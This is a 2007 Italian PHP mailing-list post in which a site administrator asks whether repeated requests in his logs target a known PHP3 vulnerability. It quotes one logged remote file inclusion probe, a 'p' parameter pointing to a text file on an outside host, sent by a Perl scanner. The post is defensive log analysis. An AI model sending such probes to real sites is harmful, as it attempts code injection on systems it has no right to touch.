[Php-it] php3 e vulnerabilita note
Aldo Galimberti
aldo.galimberti at txt.it
Tue Oct 9 17:25:36 CEST 2007
Stavo guardando le statistiche e mi e' venuto in mente di chiedervi una
cosa che vedevo spesso quando guardavo le stat di un vecchio sottosito,
che risale al 2001 quando sul mio host si usava php3
mi capitano spesso chiamate alla pagina del tipo:
/itb/index.php3?p=http://usuarios.arnet.com.ar/larry123/id.txt? ed
l'user agent usato e' Libwww-perl 5.805
PEro mi chiedo se il parametro p sia una vulnerabilita nota del php3?
visto che non viene gestito nessun load di file esterni.
Senno appena ho tempo lo converto in php4 anche se non ha senso visto
che riguardava cose avvenute 6-7 anni fa.
Consigli?
--
Aldo Galimberti - TXT Polymedia S.p.A.
v.Frigia 27 - 20126 Milano
Tel. +39 02 257711 Fax. +39 02 2578994
http://www.txt.it/
More information about the Php-it
mailing list